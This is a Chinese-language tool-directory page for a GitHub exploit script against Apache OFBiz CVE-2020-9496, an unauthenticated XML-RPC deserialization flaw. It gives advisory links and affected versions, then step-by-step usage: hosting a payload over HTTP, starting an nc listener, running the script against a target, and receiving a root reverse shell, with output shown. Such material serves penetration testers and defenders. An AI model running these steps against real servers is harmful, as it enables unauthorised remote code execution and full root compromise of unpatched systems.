Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/s4dbrd/cve-2020-9496
漏洞分析漏洞利用Web应用程序漏洞利用远程访问工具Payload 开发
GitHubs4dbrd/cve-2020-9496

CVE-2020-9496

Apache OFBiz CVE-2020-9496 不安全反序列化漏洞的利用脚本,通过精心构造的 XML-RPC 请求实现远程代码执行,并附带反弹 Shell 有效载荷投递。

查看仓库
425年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-9496

由于 webtools 中的两个与 xmlrpc 相关的请求(xmlrpc 和 ping)未使用身份验证,因此它们容易受到不安全的反序列化攻击。
该问题由 GitHub Security Lab 团队的 Alvaro Munoz [email protected] 报告给安全团队。

受影响版本 17.12.01

修复版本 18.12.01, 17.12.04

原始博客:https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
Apache 的帖子:https://issues.apache.org/jira/browse/OFBIZ-11716
GitHub 的 POC:https://github.com/g33xter/CVE-2020-9496

为了使此漏洞利用生效,您需要执行以下步骤:

步骤 1:使用 python3 托管 HTTP 服务

root@kitploit:~
> sudo python3 -m http.server 80

步骤 2:在所需端口上运行 nc 监听器(推荐 8001)

root@kitploit:~
> nc -nlvp 8001

步骤 3:更改脚本中的网站 URL 和端口:

root@kitploit:~
url='https://127.0.0.1' # 修改此处                                                         
port=8443 # 修改此处

步骤 4:如下所示运行漏洞利用

root@kitploit:~
> ./cve-2020-9496.sh -i IP -p PORT

步骤 5:检查 nc 监听器

root@kitploit:~
❯ nc -nlvp 8001
listening on [any] 8001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.x.x] 57500
bash: cannot set terminal process group (31): Inappropriate ioctl for device
bash: no job control in this shell
root@poc:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)
root@poc:/usr/src/apache-ofbiz-17.12.01# 
下载工具